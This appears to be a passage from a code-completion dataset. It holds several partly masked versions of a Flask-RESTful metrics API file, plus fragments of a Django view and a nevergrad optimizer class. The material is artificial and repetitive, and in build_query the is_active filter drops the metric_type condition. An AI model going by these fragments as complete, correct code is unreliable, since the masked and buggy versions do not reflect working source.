with connection.cursor() as curr:
curr.execute("select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id",[request.user.id])
res = namedtuplefetchall(curr)
return render(request, 'social/index.html', {'social': res})
| null | [
0,
1,
2,
3
] |
622 | 1431a0049c05a99e0b68052f56bf8e2e3c48e1aa | <mask token>
class QuantModelMetricsResource(MetricsResource):
<mask token>
<mask token>
<mask token>
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete a metric result matching the provided metric_id and cob_date.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
result = self.schema.dump(metric)
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
| <mask token>
class QuantModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- asset_class: to filter results by a given asset class.
- model_name: to filter results by a given model name.
- pricing_library: to filter results for a given pricing library.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this model endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == QuantModelMetric.metric_id)
asset_class = request.args.get('asset_class')
model_name = request.args.get('model_name')
pricing_library = request.args.get('pricing_library')
if asset_class is not None:
query = query.filter(QuantModelMetric.asset_class == asset_class)
if model_name is not None:
query = query.filter(QuantModelMetric.model_name == model_name)
if pricing_library is not None:
query = query.filter(QuantModelMetric.pricing_library ==
pricing_library)
return query
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete a metric result matching the provided metric_id and cob_date.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
result = self.schema.dump(metric)
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
| <mask token>
class MetricsResource(BaseResource):
<mask token>
def get(self):
"""
Implements the GET method for endpoint "/metrics". By default the results are
order by 'metric_id' ascending.
Implemented Query Parameters:
- is_active: to filter results that are either active or inactive. Boolean and
case insensitive.
- frequency: filter results based on a metric frequency. Values of this enum must
be respected. Case insensitive.
- threshold_type: filter results based on a metric threshold type. Values of this
enum must be respected. Case insensitive.
- sort: allows one to order the resulting collecting by 'metric_id' in descending
order. This should be done by specifying the query parameter as "sort=-metric_id".
Case insensitive.
Note: if unknown query parameters are given these will be ignored.
:return: a collection of metrics
"""
query = self.build_query()
metrics = query.all()
result = self.schema_collection.dump(metrics)
return success(result)
def build_query(self):
"""
Builds the query (without executing it) to the be used in the GET method.
:return: query with all the query conditions specified for obtaining the metrics
that are in the database and respect the desired filters (query parameters).
"""
query = Metric.query.filter(Metric.metric_type == self.metric_type)
is_active = request.args.get('is_active')
frequency = request.args.get('frequency')
threshold_type = request.args.get('threshold_type')
sort = request.args.get('sort')
if is_active is not None:
is_active = is_active.lower() == 'true'
query = Metric.query.filter_by(is_active=is_active)
if frequency is not None:
try:
frequency = Frequency.from_name(frequency)
except ValueError as e:
msg = (
f"Invalid 'frequency': {frequency}. Use one of {Frequency.values()}"
)
abort(400, message=msg)
query = query.filter_by(frequency=frequency)
if threshold_type is not None:
try:
threshold_type = ThresholdType.from_name(threshold_type)
except ValueError as e:
msg = (
f"Invalid 'threshold_type': {threshold_type}. Use one of {ThresholdType.values()}"
)
abort(400, message=msg)
query = query.filter_by(threshold_type=threshold_type)
if sort is not None and sort.lstrip('-') == 'metric_id':
query = query.order_by(Metric.metric_id.desc())
else:
query = query.order_by(Metric.metric_id)
return query
def post(self):
"""
Implements the POST method for endpoint "/metrics". It should be used to create a
new metric.
:return: the metric as a json created in the database (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
json_data['metric_id'] = 'TBD'
json_data['metric_type'] = 'model'
new_metric = self.load(json_data, session=db.session)
try:
db.session.add(new_metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
result = self.schema.dump(new_metric)
return success(result, code=201)
class QuantModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- asset_class: to filter results by a given asset class.
- model_name: to filter results by a given model name.
- pricing_library: to filter results for a given pricing library.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this model endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == QuantModelMetric.metric_id)
asset_class = request.args.get('asset_class')
model_name = request.args.get('model_name')
pricing_library = request.args.get('pricing_library')
if asset_class is not None:
query = query.filter(QuantModelMetric.asset_class == asset_class)
if model_name is not None:
query = query.filter(QuantModelMetric.model_name == model_name)
if pricing_library is not None:
query = query.filter(QuantModelMetric.pricing_library ==
pricing_library)
return query
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete a metric result matching the provided metric_id and cob_date.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
result = self.schema.dump(metric)
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
| from flask import request
from flask_restful import abort
from sqlalchemy.exc import SQLAlchemyError
from gm.main.models.model import db, Metric, QuantModelMetricSchema, MlModelMetricSchema, Frequency, QuantModelMetric, MlModelMetric, ThresholdType
from gm.main.resources import success, get_metric_by_id, BaseResource
class MetricsResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def get(self):
"""
Implements the GET method for endpoint "/metrics". By default the results are
order by 'metric_id' ascending.
Implemented Query Parameters:
- is_active: to filter results that are either active or inactive. Boolean and
case insensitive.
- frequency: filter results based on a metric frequency. Values of this enum must
be respected. Case insensitive.
- threshold_type: filter results based on a metric threshold type. Values of this
enum must be respected. Case insensitive.
- sort: allows one to order the resulting collecting by 'metric_id' in descending
order. This should be done by specifying the query parameter as "sort=-metric_id".
Case insensitive.
Note: if unknown query parameters are given these will be ignored.
:return: a collection of metrics
"""
query = self.build_query()
metrics = query.all()
result = self.schema_collection.dump(metrics)
return success(result)
def build_query(self):
"""
Builds the query (without executing it) to the be used in the GET method.
:return: query with all the query conditions specified for obtaining the metrics
that are in the database and respect the desired filters (query parameters).
"""
query = Metric.query.filter(Metric.metric_type == self.metric_type)
is_active = request.args.get('is_active')
frequency = request.args.get('frequency')
threshold_type = request.args.get('threshold_type')
sort = request.args.get('sort')
if is_active is not None:
is_active = is_active.lower() == 'true'
query = Metric.query.filter_by(is_active=is_active)
if frequency is not None:
try:
frequency = Frequency.from_name(frequency)
except ValueError as e:
msg = (
f"Invalid 'frequency': {frequency}. Use one of {Frequency.values()}"
)
abort(400, message=msg)
query = query.filter_by(frequency=frequency)
if threshold_type is not None:
try:
threshold_type = ThresholdType.from_name(threshold_type)
except ValueError as e:
msg = (
f"Invalid 'threshold_type': {threshold_type}. Use one of {ThresholdType.values()}"
)
abort(400, message=msg)
query = query.filter_by(threshold_type=threshold_type)
if sort is not None and sort.lstrip('-') == 'metric_id':
query = query.order_by(Metric.metric_id.desc())
else:
query = query.order_by(Metric.metric_id)
return query
def post(self):
"""
Implements the POST method for endpoint "/metrics". It should be used to create a
new metric.
:return: the metric as a json created in the database (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
json_data['metric_id'] = 'TBD'
json_data['metric_type'] = 'model'
new_metric = self.load(json_data, session=db.session)
try:
db.session.add(new_metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
result = self.schema.dump(new_metric)
return success(result, code=201)
class QuantModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- asset_class: to filter results by a given asset class.
- model_name: to filter results by a given model name.
- pricing_library: to filter results for a given pricing library.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this model endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == QuantModelMetric.metric_id)
asset_class = request.args.get('asset_class')
model_name = request.args.get('model_name')
pricing_library = request.args.get('pricing_library')
if asset_class is not None:
query = query.filter(QuantModelMetric.asset_class == asset_class)
if model_name is not None:
query = query.filter(QuantModelMetric.model_name == model_name)
if pricing_library is not None:
query = query.filter(QuantModelMetric.pricing_library ==
pricing_library)
return query
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete a metric result matching the provided metric_id and cob_date.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
result = self.schema.dump(metric)
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
| from flask import request
from flask_restful import abort
from sqlalchemy.exc import SQLAlchemyError
from gm.main.models.model import db, Metric, QuantModelMetricSchema, \
MlModelMetricSchema, Frequency, QuantModelMetric, MlModelMetric, \
ThresholdType
from gm.main.resources import success, get_metric_by_id, BaseResource
class MetricsResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def get(self):
"""
Implements the GET method for endpoint "/metrics". By default the results are
order by 'metric_id' ascending.
Implemented Query Parameters:
- is_active: to filter results that are either active or inactive. Boolean and
case insensitive.
- frequency: filter results based on a metric frequency. Values of this enum must
be respected. Case insensitive.
- threshold_type: filter results based on a metric threshold type. Values of this
enum must be respected. Case insensitive.
- sort: allows one to order the resulting collecting by 'metric_id' in descending
order. This should be done by specifying the query parameter as "sort=-metric_id".
Case insensitive.
Note: if unknown query parameters are given these will be ignored.
:return: a collection of metrics
"""
query = self.build_query()
metrics = query.all()
result = self.schema_collection.dump(metrics)
return success(result)
def build_query(self):
"""
Builds the query (without executing it) to the be used in the GET method.
:return: query with all the query conditions specified for obtaining the metrics
that are in the database and respect the desired filters (query parameters).
"""
# this filter is required
query = Metric.query.filter(Metric.metric_type == self.metric_type)
# get query parameters (parameters which are not here are ignored)
is_active = request.args.get('is_active')
frequency = request.args.get('frequency')
threshold_type = request.args.get('threshold_type')
sort = request.args.get('sort')
# process each parameter, and if valid add it as a query condition
if is_active is not None:
is_active = is_active.lower() == 'true'
query = Metric.query.filter_by(is_active=is_active)
if frequency is not None:
try:
frequency = Frequency.from_name(frequency)
except ValueError as e:
msg = f"Invalid 'frequency': {frequency}. Use one of {Frequency.values()}"
abort(400, message=msg)
query = query.filter_by(frequency=frequency)
if threshold_type is not None:
try:
threshold_type = ThresholdType.from_name(threshold_type)
except ValueError as e:
msg = f"Invalid 'threshold_type': {threshold_type}. Use one of " \
f"{ThresholdType.values()}"
abort(400, message=msg)
query = query.filter_by(threshold_type=threshold_type)
if sort is not None and sort.lstrip("-") == 'metric_id':
query = query.order_by(Metric.metric_id.desc())
else:
query = query.order_by(Metric.metric_id)
return query
def post(self):
"""
Implements the POST method for endpoint "/metrics". It should be used to create a
new metric.
:return: the metric as a json created in the database (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
# make sure the metric_id (temporary) and metric_type (model) are filled
json_data["metric_id"] = "TBD"
json_data["metric_type"] = "model"
# validate and deserialize input
new_metric = self.load(json_data, session=db.session)
# get the next metric id and update metric object
try:
db.session.add(new_metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
# dump to json and return result
result = self.schema.dump(new_metric)
return success(result, code=201)
class QuantModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- asset_class: to filter results by a given asset class.
- model_name: to filter results by a given model name.
- pricing_library: to filter results for a given pricing library.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this model endpoint.
"""
# build query from base class add required field for joining with parent
query = super().build_query()
query = query.filter(Metric.metric_id == QuantModelMetric.metric_id)
# get the remaining query parameters
asset_class = request.args.get('asset_class')
model_name = request.args.get('model_name')
pricing_library = request.args.get('pricing_library')
# process each parameter and, if valid, add as a query condition
if asset_class is not None:
query = query.filter(QuantModelMetric.asset_class == asset_class)
if model_name is not None:
query = query.filter(QuantModelMetric.model_name == model_name)
if pricing_library is not None:
query = query.filter(QuantModelMetric.pricing_library == pricing_library)
return query
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
# Validate and deserialize input
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
# if it was found and deserialized successfully try to commit
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete a metric result matching the provided metric_id and cob_date.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
# dump as json to send in the end if del is successful
result = self.schema.dump(metric)
# if result was found, delete it from database
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs) | [
16,
19,
23,
25,
26
] |
623 | 4a136a6284add3bcbd7f9546e18e79151cea685f | <mask token>
class _BaseNevergradOptimizer:
<mask token>
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
